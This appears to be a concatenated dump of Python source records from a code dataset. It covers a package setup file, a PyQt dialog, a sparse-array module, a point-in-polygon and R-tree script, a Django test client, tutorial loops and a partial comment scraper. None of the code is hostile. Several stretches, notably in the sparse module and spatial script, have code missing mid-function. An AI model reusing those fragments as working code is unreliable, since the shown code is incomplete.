name)\n if os.path.isdir(fn):\n bad_name = False\n for pattern in exclude_directories:\n if (fnmatchcase(name, pattern)\n or fn.lower() == pattern.lower()):\n bad_name = True\n break\n if bad_name:\n continue\n if os.path.isfile(os.path.join(fn, '__init__.py')):\n if not package:\n new_package = name\n else:\n new_package = package + '.' + name\n stack.append((fn, '', new_package))\n else:\n stack.append((fn, prefix + name + '/', package))\n else:\n bad_name = False\n for pattern in exclude:\n if (fnmatchcase(name, pattern)\n or fn.lower() == pattern.lower()):\n bad_name = True\n break\n if bad_name:\n continue\n out.setdefault(package, []).append(prefix+name)\n return out\n\nsetup(name='docassemble.base',\n version='0.2.89',\n description=('The base components of the docassemble system.'),\n long_description=read(\"README.md\"),\n long_description_content_type='text/markdown',\n author='Jonathan Pyle',\n author_email='jhpyle@gmail.com',\n license='MIT',\n url='https://docassemble.org',\n download_url='https://download.docassemble.org/docassemble-base.tar.gz',\n namespace_packages = ['docassemble'],\n install_requires = ['docassemble==0.2.89', '3to2', 'astunparse', 'babel', 'bcrypt', 'blinker', 'cffi', 'fdfgen', 'guess-language-spirit', 'httplib2', 'itsdangerous', 'jellyfish==0.5.6', 'jinja2', 'lxml', 'mako', 'markdown', 'markupsafe', 'mdx-smartypants', 'namedentities==1.5.2', 'passlib', 'pdfminer', 'pillow', 'pip', 'pycparser', 'pycrypto', 'geopy', 'pygments', 'pyjwt', 'pypdf', 'pypdftk', 'PyPDF2', 'python-dateutil', 'pytz', 'pyyaml', 'ruamel.yaml', 'qrcode', 'six', 'titlecase', 'wheel', 'pattern', 'tzlocal', 'us', 'phonenumbers', 'pycountry', 'ua-parser', 'user-agents', 'textstat', 'twine', 'docxtpl', 'qrtools'],\n packages=find_packages(),\n zip_safe = False,\n package_data=find_package_data(where='docassemble/base/', package='docassemble.base'),\n )\n","sub_path":"docassemble_base/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"240075240","text":"import importlib\nimport os\nimport pkgutil\n\nfrom crc.api.common import ApiError\n\n\nclass Script(object):\n \"\"\" Provides an abstract class that defines how scripts should work, this\n must be extended in all Script Tasks.\"\"\"\n\n def get_description(self):\n raise ApiError(\"invalid_script\",\n \"This script does not supply a description.\")\n\n def do_task(self, task, study_id, workflow_id, **kwargs):\n raise ApiError(\"invalid_script\",\n \"This is an internal error. The script you are trying to execute '%s' \" % self.__class__.__name__ +\n \"does not properly implement the do_task function.\")\n\n def do_task_validate_only(self, task, study_id, workflow_id, **kwargs):\n raise ApiError(\"invalid_script\",\n \"This is an internal error. The script you are trying to execute '%s' \" % self.__class__.__name__ +\n \"does must provide a validate_only option that mimics the do_task, \" +\n \"but does not make external calls or database updates.\" )\n\n @staticmethod\n def get_all_subclasses():\n return Script._get_all_subclasses(Script)\n\n @staticmethod\n def _get_all_subclasses(cls):\n\n # hackish mess to make sure we have all the modules loaded for the scripts\n pkg_dir = os.path.dirname(__file__)\n for (module_loader, name, ispkg) in pkgutil.iter_modules([pkg_dir]):\n importlib.import_module('.' 
+ name, __package__)\n\n\n \"\"\"Returns a list of all classes that extend this class.\"\"\"\n all_subclasses = []\n\n for subclass in cls.__subclasses__():\n all_subclasses.append(subclass)\n all_subclasses.extend(Script._get_all_subclasses(subclass))\n\n return all_subclasses\n\n def add_data_to_task(self, task, data):\n key = self.__class__.__name__\n if key in task.data:\n task.data[key].update(data)\n else:\n task.data[key] = data\n\nclass ScriptValidationError:\n\n def __init__(self, code, message):\n self.code = code\n self.message = message\n\n @classmethod\n def from_api_error(cls, api_error: ApiError):\n return cls(api_error.code, api_error.message)\n","sub_path":"crc/scripts/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"106372434","text":"import os\n\nfrom PyQt5.QtWidgets import (QDialog, QDialogButtonBox, QFormLayout, \n QPushButton, QDialogButtonBox, QFileDialog, QHBoxLayout, QLabel, \n QGroupBox, QVBoxLayout, QFrame, QListView,)\nfrom PyQt5.QtGui import QIcon\n\nclass NewExperiment(QDialog):\n \"\"\"A modal window to parameter a new experiment\n \"\"\"\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setWindowTitle('New Experiment')\n self.resize(800, 600)\n \n \n self.directory = os.path.os.getcwd() # project directory\n self.dirLabel = QLabel(self.directory) # currently set project directory\n \n browseBtn = QPushButton(QIcon.fromTheme('folder'), '', self)\n\n dataForm = QGroupBox(self.tr('Path to data directory'), self)\n\n formLayout = QFormLayout(dataForm)\n formLayout.addRow(browseBtn, self.dirLabel)\n\n modalLayout = QHBoxLayout()\n setupLayout = QVBoxLayout()\n previewLayout = QVBoxLayout()\n\n setupLayout.addWidget(dataForm)\n setupLayout.addStretch(1)\n\n fileFrame = QFrame(self)\n\n previewLayout.addChildWidget(fileFrame)\n previewLayout.addStretch(1)\n\n \n\n modalLayout.addLayout(setupLayout)\n modalLayout.addLayout(previewLayout)\n modalLayout.addStretch(1)\n\n self.setLayout(modalLayout)\n\n\n browseBtn.clicked.connect(self.select_directory)\n \n def select_directory(self):\n self.directory = QFileDialog.getExistingDirectory(self, \"RMN Data directory\", self.directory)\n self.dirLabel.setText(self.directory)\n \n","sub_path":"package/dialogs/InitModal.py","file_name":"InitModal.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"244105826","text":"class Conversor():\n\n def for_decimal(self, n_hex, base):\n letras = {\n \"A\": 10,\n \"B\": 11,\n \"C\": 12,\n \"D\": 13,\n \"E\": 14,\n \"F\": 15\n }\n \n expo = 0\n \n arr_hex = map(str,str(n_hex).upper())\n\n arr_hex = list(arr_hex)\n\n arr_hex.reverse()\n\n result = 0\n\n for n in arr_hex:\n num = int(letras[n]) if n in letras else int(n)\n result = result + (num * (base**expo))\n expo = expo + 1\n\n return result\n","sub_path":"com/conversor/conversores.py","file_name":"conversores.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"639317393","text":"from collections import deque\n\n\nclass Solution:\n \"\"\"\n @param: numCourses: a total of n courses\n @param: prerequisites: a list of prerequisite pairs\n @return: the course order\n \"\"\"\n\n def findOrder(self, numCourses, prerequisites):\n # write your code here\n edges = {i: [] for i in range(numCourses)}\n 
indegrees = [0 for i in range(numCourses)]\n for pair in prerequisites:\n edges[pair[1]].append(pair[0])\n indegrees[pair[0]] += 1\n\n queue = deque([x for x in range(numCourses) if indegrees[x] == 0])\n result = []\n while queue:\n node = queue.popleft()\n result.append(node)\n for neighbor in edges[node]:\n indegrees[neighbor] -= 1\n if indegrees[neighbor] == 0:\n queue.append(neighbor)\n\n return result if len(result) == numCourses else []","sub_path":"616_Course_Schedule_II.py","file_name":"616_Course_Schedule_II.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"188691858","text":"# Copyright (c) 2014 Evalf\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\nThe sparse module defines a dtype for numpy that represents sparse data in\nn-dimensional coo-format. That is, every array element contains an index into a\nlarger sparse object, and a value, which can be of any numpy supported data\ntype including integers, floating point values and complex data. Additionally,\nthe dtype carries the shape of the sparse object as metadata, which makes the\nnumpy array into an entirely self contained sparse object.\n\nIn addition to the dtype, the sparse module provides a range of methods for\nmanipulation of sparse data, such as deduplication of indices, pruning of\nzeros, sparse addition, and conversion to other sparse or dense data formats.\n\"\"\"\n\nimport numpy\n\nchunksize = 0x10000000 # 256MB\n\ndef dtype(shape, vtype=numpy.float64):\n '''Numpy data dtype for sparse data.\n\n Returns a structured dtype with fields 'index' and 'value', where index is\n again structured with fields 'i0', 'i1', etc, and value is of type ``vtype``.\n The indices are of the smallest unsigned integer type that can encode all\n indices within ``shape``, and carry the shape as metadata.\n\n Args\n ----\n shape : :class:`tuple` of integers.\n Shape of the sparse object.\n vtype : :class:`numpy.dtype` or :class:`str`\n Data dype of the sparse object (i.e. 
the nonzero values).\n\n Returns\n -------\n dtype : :class:`numpy.dtype`\n The sparse dtype.\n '''\n\n return _dtype([((int(n), 'i'+str(i)), '>u'+str(1 if n <= 256 else 2 if n <= 256**2 else 4 if n <= 256**4 else 8)) for i, n in enumerate(shape)], vtype)\n\ndef issparse(data):\n return isinstance(data, numpy.ndarray) and issparsedtype(data.dtype)\n\ndef issparsedtype(dtype):\n return dtype.names == ('index', 'value') and all(\n len(value) == 3 and isinstance(value[2], int) and 0 <= value[2] < 256**value[0].itemsize\n for value in dtype['index'].fields.values())\n\ndef ndim(data):\n '''Dimension of the sparse object.'''\n\n return len(data.dtype['index'].names)\n\ndef shape(data):\n '''Shape of the sparse object.'''\n\n itype = data.dtype['index']\n return tuple(itype.fields[name][2] for name in itype.names)\n\ndef indices(data):\n '''Tuple of indices of the nonzero values of the sparse object.'''\n\n index = data['index']\n return tuple(index[i] for i in index.dtype.names)\n\ndef values(data):\n '''Nonzero values of the sparse object.'''\n\n return data['value']\n\ndef extract(data):\n '''Tuple of indices, values, and shape of the sparse object.'''\n\n return indices(data), values(data), shape(data)\n\ndef empty(shape, vtype=numpy.float64):\n '''Completely sparse array of given shape and data type.'''\n\n return numpy.empty(0, dtype=dtype(shape, vtype))\n\ndef result_type(dtype0, *dtypes):\n '''Sparse analogue of :func:`numpy.result_type`.'''\n\n if not dtypes:\n return dtype0\n if any(dtype['index'] != dtype0['index'] for dtype in dtypes):\n raise Exception('non-matching shapes')\n return _dtype(dtype0['index'], numpy.result_type(dtype0['value'], *[dtype['value'] for dtype in dtypes]))\n\ndef dedup(data, inplace=False):\n '''Deduplicate indices.\n\n Dedup sorts data in lexicographical order and sums all values with matching\n indices such that the returned array has at most one value per sparse index.\n The sorting happens in place, which means that ``dedup`` changes the order of\n the input argument. Additionally, if ``inplace`` is true, the deduplication\n step reuses the input array's memory. This may affect the size of the array,\n which should no longer be used after deduplication in place. In case the\n input has no duplicates the input array is returned.\n\n >>> from nutils.sparse import dtype, dedup\n >>> from numpy import array\n >>> A = array([((0,1),.1), ((1,0),.2), ((0,1),.3)], dtype=dtype([2,2]))\n >>> dedup(A)\n array([((0, 1), 0.4), ((1, 0), 0.2)],\n dtype=[('index', [((2, 'i0'), 'u1'), ((2, 'i1'), 'u1')]), ('value', ' n[i]\n chunk = buf[:len(s)] if overlap else data[i:i+len(s)]\n numpy.take(data['index'], n[i:i+len(s)], out=chunk['index'])\n chunk['value'].fill(0)\n numpy.add.at(chunk['value'], numpy.arange(len(s)).repeat(s), data['value'][n[i]:n[i+len(s)]])\n if overlap:\n data[i:i+len(s)] = chunk\n return _resize(data, len(n)-1)\n else:\n offsets = keep.cumsum()\n dedup = numpy.empty(offsets[-1]+1, dtype=data.dtype)\n dedup[0] = data[0]\n numpy.compress(keep, data['index'][1:], out=dedup['index'][1:])\n dedup['value'][1:].fill(0)\n numpy.add.at(dedup['value'], offsets, data['value'][1:])\n return dedup\n\ndef prune(data, inplace=False):\n '''Prune zero values.\n\n Prune returns a sparse object with all zero values removed. If ``inplace`` is\n true the returned object reuses the input array's memory. This may affect the\n size of the array, which should no longer be used after pruning in place. 
In\n case the input has no zeros the input array is returned.\n\n >>> from nutils.sparse import dtype, prune\n >>> from numpy import array\n >>> A = array([((0,1),.1), ((1,0),0), ((0,1),.3)], dtype=dtype([2,2]))\n >>> prune(A)\n array([((0, 1), 0.1), ((0, 1), 0.3)],\n dtype=[('index', [((2, 'i0'), 'u1'), ((2, 'i1'), 'u1')]), ('value', ' s[0]\n chunk = buf[:len(s)] if overlap else data[i:i+len(s)]\n numpy.take(data, s, out=chunk)\n if overlap:\n data[i:i+len(s)] = chunk\n return _resize(data, len(nz))\n else:\n return numpy.compress(data['value'], data)\n\ndef add(datas):\n '''Add sparse objects.\n\n Returns the sum of a list of sparse objects by concatenating the sparse\n entries. The returned array is of the data type mandated by Numpy's promotion\n rules. In case ``datas`` contains only one item of nonzero length and this\n item has the correct data type, then this array is returned as-is.\n\n >>> from nutils.sparse import dtype, add\n >>> from numpy import array\n >>> A = array([((0,1),.1), ((1,0),.2)], dtype=dtype([2,2]))\n >>> B = array([((0,1),.3)], dtype=dtype([2,2]))\n >>> add([A, B])\n array([((0, 1), 0.1), ((1, 0), 0.2), ((0, 1), 0.3)],\n dtype=[('index', [((2, 'i0'), 'u1'), ((2, 'i1'), 'u1')]), ('value', '>> from nutils.sparse import dtype, toarray\n >>> from numpy import array\n >>> A = array([((0,1),.1), ((1,0),.2), ((0,1),.3)], dtype=dtype([2,2]))\n >>> toarray(A)\n array([[ 0. , 0.4],\n [ 0.2, 0. ]])\n '''\n\n indices, values, shape = extract(data)\n if not shape:\n return values.sum()\n retval = numpy.zeros(shape, values.dtype)\n numpy.add.at(retval, indices, values)\n return retval\n\ndef fromarray(data):\n '''Convert dense array to sparse object.\n\n >>> from nutils.sparse import dtype, fromarray\n >>> from numpy import array\n >>> A = array([[0, .4], [.2, 0]])\n >>> fromarray(A)\n array([((0, 0), 0. ), ((0, 1), 0.4), ((1, 0), 0.2), ((1, 1), 0. 
)],\n dtype=[('index', [((2, 'i0'), 'u1'), ((2, 'i1'), 'u1')]), ('value', ' testy) != (vj.y > testy)) and (testx < (vj.x - vi.x) * (testy - vi.y) / (vj.y - vi.y) + vi.x)):\n\t\t\t\tc = not(c)\n\n\t\t\tif(vi.x == firstX and vi.y == firstY):\n\t\t\t\ti = i + 1\n\t\t\t\tif (i < nvert):\n\t\t\t\t\tvi = self.points[i];\n\t\t\t\t\tfirstX = vi.x;\n\t\t\t\t\tfirstY = vi.y;\n\t\t\tj = i\n\t\t\ti = i + 1\n\t\treturn c\n\n\tdef bounds(self):\n\t\treturn self.bound\n\n# Create a simple polygon\nglobal jfk\njfk = Polygon([Point(-73.7712, 40.6188),Point(-73.7674, 40.6233),Point(-73.7681, 40.6248),Point(-73.7657, 40.6281),Point(-73.7472, 40.6356),Point(-73.7468, 40.6422),Point(-73.7534, 40.6469),Point(-73.7544, 40.6460),Point(-73.7745, 40.6589),Point(-73.7858, 40.6628),Point(-73.7891, 40.6634),Point(-73.7903, 40.6655),Point(-73.8021, 40.6658),Point(-73.8146, 40.6632),Point(-73.8210, 40.6638),Point(-73.8244, 40.6621),Point(-73.8248, 40.6546),Point(-73.8212, 40.6469),Point(-73.7848, 40.6302),Point(-73.7899, 40.6223),Point(-73.7831, 40.6203),Point(-73.7782, 40.6274),Point(-73.7731, 40.6235),Point(-73.7738, 40.6193),Point(-73.7712, 40.6188)])\n\t\nglobal lga\nlga = Polygon([Point(-73.8888, 40.7662),Point(-73.8898, 40.7736),Point(-73.8843, 40.7751),Point(-73.8852, 40.7808),Point(-73.8795, 40.7812),Point(-73.8788, 40.7842),Point(-73.8751, 40.7827),Point(-73.8711, 40.7864),Point(-73.8673, 40.788),Point(-73.868, 40.7832),Point(-73.8716, 40.7808),Point(-73.8534, 40.773),Point(-73.8557, 40.7697),Point(-73.8505, 40.7673),Point(-73.85, 40.7645),Point(-73.8529, 40.7637),Point(-73.856, 40.7676),Point(-73.8594, 40.7659),Point(-73.8625, 40.7654),Point(-73.8672, 40.7693),Point(-73.8732, 40.7714),Point(-73.8871, 40.7697),Point(-73.8866, 40.7665),Point(-73.8888, 40.7662)])\n\n\ndef simplePolygonTest():\n\tprint(\"Point in polygon test\")\n\n\tcount = 0\n\t# Test if the polygon contains the two points\n\twith open('C:/Lab10/taxigreen(06-15)_table.csv') as csvfile:\n\t\treader = csv.DictReader(csvfile)\n\t\tstart_time = time.time() # Record query execution time\n\t\tfor row in reader:\n\t\t\ttry:\n\t\t\t\tpt = Point(float(row['Dropoff_longitude']), float(row['Dropoff_latitude']))\n\t\t\t\tif jfk.contains(pt): # Switch between jfk and lga for counting the number of in polygon\n\t\t\t\t\tcount +=1\n\n\t\t\texcept ValueError:\n\t\t\t\tcontinue\n\n\t\tprint(\"--- JFK without R-tree index: %d rows in set (%s sec) ---\" % (count,(time.time() - start_time)))\n\n\tcount = 0\n\t# Test if the polygon contains the two points\n\twith open('C:/Lab10/taxigreen(06-15)_table.csv') as csvfile:\n\t\treader = csv.DictReader(csvfile)\n\t\tstart_time = time.time() # Record query execution time\n\t\tfor row in reader:\n\t\t\ttry:\n\t\t\t\tpt = Point(float(row['Dropoff_longitude']), float(row['Dropoff_latitude']))\n\t\t\t\tif lga.contains(pt): # Switch between jfk and lga for counting the number of in polygon\n\t\t\t\t\tcount +=1\n\n\t\t\texcept ValueError:\n\t\t\t\tcontinue\n\n\t\tprint(\"--- LGA without R-tree index: %d rows in set (%s sec) ---\" % (count,(time.time() - start_time)))\n\n\ndef simpleRTree():\n\tprint(\"R-tree test\")\n\tidx = index.Index()\n\tglobal count\n\tcount = 0\n\ti = 1\n\twith open('C:/Lab10/sample-taxi-data.csv') as csvfile:\n\t\treader = csv.DictReader(csvfile)\n\t\tfor row in reader:\n\t\t\ttry:\n\t\t\t\t# Insert the points into the R-tree index\n\t\t\t\tpt = Point(float(row['Dropoff_longitude']), float(row['Dropoff_latitude']))\n\t\t\t\tidx.insert(i,(pt.x,pt.y,pt.x,pt.y))\n\t\t\t\ti +=1\n\t\t\texcept 
ValueError:\n\t\t\t\tcontinue\n\t\t\n \n \n\t# Query. This library only supports rectangular queries\n\t# Perform the query\n\tprint(\"Query result:\")\n\tstart_time = time.time() # Record query execution time\n\tresults1 = list(idx.intersection(jfk.bound))\n\tresults2 = list(idx.intersection(lga.bound)) \n\tprint(len(results1))\n\tprint(len(results2))\n\tprint(\"--- rows in set (%s sec) ---\" % ((time.time() - start_time)) ) \n\n\n\n# start_time = time.time()\n\n# simplePolygonTest()\nsimpleRTree()\n\n# print(\"--- %d rows in set (%s sec) ---\" % (count,(time.time() - start_time)) )","sub_path":"spatial.py","file_name":"spatial.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"176881251","text":"from django.test import TestCase\nfrom django.test.client import Client\n\nfrom django.conf import settings\nfrom django.contrib.auth import authenticate, login\nfrom django.utils.importlib import import_module\nfrom django.http import HttpRequest, SimpleCookie\n\nclass Client(Client):\n\n def login(self, **credentials):\n \"\"\"\n Sets the Factory to appear as if it has successfully logged into a site.\n\n Returns True if login is possible; False if the provided credentials\n are incorrect, or the user is inactive, or if the sessions framework is\n not available.\n \"\"\"\n user = authenticate(**credentials)\n if user and user.is_active \\\n and 'user_sessions' in settings.INSTALLED_APPS:\n engine = import_module(settings.SESSION_ENGINE)\n\n # Create a fake request to store login details.\n request = HttpRequest()\n if self.session:\n request.session = self.session\n else:\n request.session = engine.SessionStore('ua', '127.0.0.1')\n login(request, user)\n\n # Save the session values.\n request.session.save()\n\n # Set the cookie to represent the session.\n session_cookie = settings.SESSION_COOKIE_NAME\n self.cookies[session_cookie] = request.session.session_key\n cookie_data = {\n 'max-age': None,\n 'path': '/',\n 'domain': settings.SESSION_COOKIE_DOMAIN,\n 'secure': settings.SESSION_COOKIE_SECURE or None,\n 'expires': None,\n }\n self.cookies[session_cookie].update(cookie_data)\n\n return True\n else:\n return False\n\n def logout(self):\n \"\"\"\n Removes the authenticated user's cookies and session object.\n\n Causes the authenticated user to be logged out.\n \"\"\"\n session = import_module(settings.SESSION_ENGINE).SessionStore('ua', '127.0.0.1')\n session_cookie = self.cookies.get(settings.SESSION_COOKIE_NAME)\n if session_cookie:\n session.delete(session_key=session_cookie.value)\n self.cookies = SimpleCookie()\n\nclass TestCase(TestCase):\n \"\"\"Our Client should use the user_session\"\"\"\n client_class = Client\n\n","sub_path":"user_sessions/testclient.py","file_name":"testclient.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"241035955","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 5 09:55:10 2019\n\n@author: ninenins\n\"\"\"\n\n# for loop has range(start stop,step)\n# defualt (0,step,1) \n\n## compare the while and for loops\n#########################################\nprint(\"The while loop results\")\nn = 0\nwhile n < 5:\n print(n)\n n += 1\n## the for loop\nprint(\"The for loop results\")\nfor m in range (5):\n print(m)\n \n## loop through a tuple\nmonths = (\"January\",\"February\",\"March\",\"April\",\"Octorber\",\"December\")\nfor item in 
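The `contains` method in the spatial.py record above is the classic even-odd (ray-casting) point-in-polygon rule: walk the edges and flip a boolean every time a horizontal ray from the test point crosses one. The same rule as a self-contained sketch, using plain (x, y) tuples instead of the record's `Point`/`Polygon` classes:

def point_in_polygon(vertices, x, y):
    # Even-odd rule: count how many edges a horizontal ray from (x, y) crosses.
    inside = False
    j = len(vertices) - 1
    for i in range(len(vertices)):
        xi, yi = vertices[i]
        xj, yj = vertices[j]
        # The edge straddles the ray vertically and the crossing lies right of x.
        if (yi > y) != (yj > y) and x < (xj - xi) * (y - yi) / (yj - yi) + xi:
            inside = not inside
        j = i
    return inside

square = [(0, 0), (4, 0), (4, 4), (0, 4)]
print(point_in_polygon(square, 2, 2))  # True
print(point_in_polygon(square, 5, 2))  # False

An R-tree, as in `simpleRTree`, only answers rectangular range queries; a complete point-in-polygon workflow would use the index to shortlist candidates by bounding box and then apply the exact test above to each candidate.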
months:\n if \"r\" in item.lower():\n print(item)\n ## the outer loop \nfor m in range(1,6):\n ## the inner loop\n for n in range (1,6):\n print(m, \"x\", n, \"=\", m*n, \"\\t\",end=\" \")\n \n## show how to create a list by reading a file of strings\n## using a for loop\ndataList = []\n\ninfile = open(\"/Users/ninenins/Desktop/python/课本/DataFile.txt\",\"r\")\n\nfor line in infile:\n dataList.append(line.strip())\ninfile.close()\n\nprint(dataList)\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n\n\n","sub_path":"课堂笔记/3:5.py","file_name":"3:5.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"639479872","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom openerp import models, fields, api, _\nfrom openerp.exceptions import ValidationError\n\nclass CommercialFishingLicenseRequest(models.Model):\n _inherit = 'elicense.request.commercial'\n\n def confirm(self):\n if not self.remarks:\n self.remarks = ''\n if self.vessel_id.changing_ton_gross:\n self.remarks += _(u\" - Vessel license no. %s is in gross tonnage size changing procedure.\\n\") % (self.vessel_id.ship_code)\n if self.vessel2_id.changing_ton_gross:\n self.remarks += _(u\" - Vessel license no. %s is in gross tonnage size changing procedure.\\n\") % (self.vessel2_id.ship_code)\n super(CommercialFishingLicenseRequest, self).confirm()\n","sub_path":"elicense_commercial_changing_tgross/models/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"493070979","text":"import cv2\nimport numpy\n\n# drawing rectangle\n\nimg = cv2.imread('me.jpg')\ncv2.rectangle(img, (600, 100), (1800, 1600), (255, 255, 255), 10) # x1, y1 and x2, y2 and 10 represent thickness of rectangle\ncv2.imwrite('rectangle_in_img.jpg', img)\nimg = cv2.resize(img, (700, 500))\ncv2.imshow('rectangle', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n","sub_path":"Rectangle.py","file_name":"Rectangle.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"520860030","text":"# -*- coding: utf-8 -*-\n# nearest_time.py\n################################################################\n################################################################\n#Python script to calculate the time when the orbit approached\n#the epicenter most.\n#===============================================================\n#Explanation of each object:\n#---------------------------------------------------------------\n#t1 :an object which contains starting time.\n#file_names :a list object which contains the names of\n# the files.\n# where orbit data is preserved.\n#list_file :a list object which will contain the file\n# names not meeting the requirements.\n#df :a data frame object which contains the input\n# data.\n#min_val :an object which contains the minimum value of the\n# distance between the data point and the epicenter.\n#list1 :a list object which contains the distance data.\n#min_index_num :an object which contains the index where the\n# distance becomes the minimum.\n#base_time :an object which contains the time when the\n# distance becomes minimum.\n#output_list :a data frame object which contains the names of\n# files not meeting the requirements.\n#t2 :an object which contains finishing time.\n#elapsed_time :an object which contains elapsed 
time.\n#***************************************************************\n#Structure of this \"nearest_time.py\" script:\n#---------------------------------------------------------------\n#\n#[1. Importing modules]\n#1-1. Importing pandas, time and glob modules.\n#\n#\n#[2. measuring execution time]\n#2-1. measuring starting time with time module\n#\n#\n#[3. Exporting file names.]\n#3-1. Exporting file names.\n#\n#\n#[4. Making a list object.]\n#4-1. Making a list object which will contain the file names\n# which do not meet the requirements.\n#\n#\n#[5. Calculating the time when the orbit approached\n# the epicenter most.]\n#5-1. Importing the data from a csv file.\n#5-2. Resetting the index.\n#5-3. Extracting the distance to check whether the point\n# meet the distance requirement.\n#5-4. Converting the data frame data into a list format data.\n#5-5. Extracting the index value where the distance is the\n# minimum.\n#5-6. Setting the time to zero when the distance is the minimum.\n#5-7. Modifying other time value according to the time when\n# the distance is the minimum.\n#5-8. Confirming whether the data covers from -250 to 250.\n# If so, the data is exported. Otherwise, not exported.\n#\n#5-9. Exporting the file names which do not covers the time from\n# from -250 to 250.\n#\n#\n#[6. measuring execution time]\n#6-1. Measuring finishing time with time module.\n#6-2. Output elapsed time.\n#\n################################################################\n################################################################\n#\n#[1. Importing modules]\n#1-1. Importing pandas, time and glob modules.\n#\nimport pandas as pd\nimport time\nimport glob\n#\n#\n#[2. measuring execution time]\n#2-1. measuring starting time with time module\n#\nt1 = time.time()\n#\n#\n#[3. Exporting file names.]\n#3-1. Exporting file names.\n#\nfile_names = glob.glob(\".\\\\for_stacking_distance\\\\dist*\")\n#\n#\n#[4. Making a list object.]\n#4-1. Making a list object which will contain the file names\n# which do not meet the requirements.\n#\nlist_file = []\n#\n#\n#[5. Calculating the time when the orbit approached\n# the epicenter most.]\n#\nfor i in range(len(file_names)):\n#\n#5-1. Importing the data from a csv file.\n#\n df = pd.read_csv(file_names[i],index_col = 0)\n#\n#5-2. Resetting the index.\n#\n df.reset_index(drop = True, inplace = True)\n#\n#5-3. Extracting the distance to check whether the point\n# meet the distance requirement.\n#\n min_val = min(df[\"distance\"])\n if min_val >330:\n continue\n#\n#5-4. Converting the data frame data into a list format data.\n#\n list1 = list(df[\"distance\"])\n#\n#5-5. Extracting the index value where the distance is the\n# minimum.\n#\n min_index_num = list1.index(min_val)\n#\n#5-6. Setting the time to zero when the distance is the minimum.\n#\n base_time = df.iloc[min_index_num, 16]\n#\n#5-7. Modifying other time value according to the time when\n# the distance is the minimum.\n#\n df[\"adjusted_time\"] = df.iloc[:,16]-base_time\n#\n#5-8. Confirming whether the data covers from -250 to 250.\n# If so, the data is exported. Otherwise, not exported.\n#\n if (df.iloc[0,17] < -250 and df.iloc[len(df)-1,17] >250):\n output_name = file_names[i].replace(\".\\\\for_stacking_distance\\\\dist\",\"stacking\")\n df.to_csv(output_name)\n else:\n list_file.append(file_names[i])\n#\n#5-9. Exporting the file names which do not covers the time from\n# from -250 to 250.\n#\noutput_list = pd.DataFrame(list_file)\noutput_list.to_csv(\"non_concide_list.csv\")\n#\n#\n#[6. 
measuring execution time]\n#6-1. Measuring finishing time with time module.\n#\nt2 = time.time()\nelapsed_time = t2-t1\nelapsed_time = round(elapsed_time,3)\n#\n#6-2. Output elapsed time.\n#\nprint(\"elapsed time = \", elapsed_time, \"sec and in hour, \",elapsed_time/3600)\n#\n################################################################\n","sub_path":"9_moving_average/2./stacking_ver3.py","file_name":"stacking_ver3.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"635026470","text":"import requests\nimport re\nfrom urllib.parse import urlencode\nimport time\n\ndef get_html(url, page):\n header = {\n \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\",\n }\n params = {\n # 'callBack': 'fetchJSON_comment98',\n 'productID': 100019867468,\n 'score': 0,\n 'sortType': 6,\n 'page': page,\n 'pageSize': 10,\n 'isShadowSku': 0,\n 'rid': 0,\n 'fold': 1\n }\n res = \"\"\n url = url + urlencode(params)\n try:\n req = requests.get(url = url, params = params, headers = header)\n time.sleep(0.5)\n print(req.text)\n\n 